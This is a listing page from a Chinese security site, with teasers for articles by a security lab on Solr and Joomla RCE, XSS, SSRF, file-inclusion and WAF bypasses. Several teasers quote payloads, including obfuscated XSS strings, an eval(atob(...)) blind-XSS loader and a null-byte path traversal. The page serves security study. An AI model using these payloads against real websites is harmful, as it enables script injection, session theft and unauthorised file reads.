khan - 第 3 | CN-SEC 中文网

安全漏洞

漏洞预警：Apache Solr 远程代码执行漏洞

00x01 漏洞背景Solr是一个独立的企业级搜索应用服务器，它对外提供类似于Web-service的API接口。用户可以通过http请求，向搜索引擎服务器提交一定格式的XML文件，生成索引；也可以通...

07月25日58 views评论

阅读全文

安全文章

WAF Bypasser

d=document,b='`',d['loca'+'tion']='javascript&colon;aler'+'t'+b+domain+b 原文始发于微信公众号（Khan安全攻防实验室）...

07月14日29 views评论

阅读全文

安全文章

Blind XSS

Payload："><input onfocus=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCg...

06月07日26 views评论

阅读全文

安全新闻

黑客10秒无钥匙开走特斯拉：重大漏洞曝出

关注我们带你读懂网络安全不止特斯拉，有不少能手机解锁的车都可以用同样的方法破解，智能门锁也可以。编辑：泽南如今，很多特斯拉车主都已习惯不带钥匙用手机解锁车辆，但最近一位网络安全研究人员已经展示了「无钥...

05月19日28 views评论

阅读全文

安全文章

从本地文件包含到RCE的十种方法

文章来源：Khan安全攻防实验室文件上传PHP包装器日志文件/proc/self/environ/proc/*/fdPHP会话PHPinfo()/tmp文件PHP Assert()函数读取...

04月01日177 views评论

阅读全文

安全文章

文件读取 WAF 绕过

.%00./file.php 原文始发于微信公众号（Khan安全攻防实验室）：文件读取 WAF 绕过

03月23日227 views评论

阅读全文

安全文章

重定向 SSRF 绕过

如果本地主机和元数据调用受到限制，将此Payload保存为攻击者服务器中。<?php header...

03月17日91 views评论

阅读全文

安全文章

Bypass final Payload Cloudflare

<h1/%6f%6e/oNclicK=alert`hacked`>CLICK HERE 原文始发于微信公众号（Khan安全攻防实验室）：Bypass final Payload Cloud...

03月14日83 views评论

阅读全文

安全文章

我在src挖了个2000块的漏洞

本次仅为学习交流，请遵守《中华人民共和国网络安全法》,勿用于非授权测试,如作他用所承受的法律责任一概与作者无关。由于过年游手好闲，利用挖src来过过时间。挖漏洞我们是专业的！ &...

03月07日115 views评论

阅读全文

应急响应

应急响应的一点小Tips（有手就行）

来源：Khan安全攻防实验室如何证明恶意的宏被启用和点击了？ HKEY_LOCAL_MACHINEUSER...

02月23日88 views评论

阅读全文

安全文章

Joomla 3.0-3.4.6-rce复现

00x00 前言Joomla是一套内容管理系统，由PHP加Mysql数据库所开发的系统。该漏洞本质上这是一个Session反序列化导致的RCE漏洞，由于Joomla对于Session的特殊处...

01月02日101 views评论

阅读全文

安全文章

奇技淫巧(12) - XSS payload

12月27日105 views评论

阅读全文

在线咨询

微信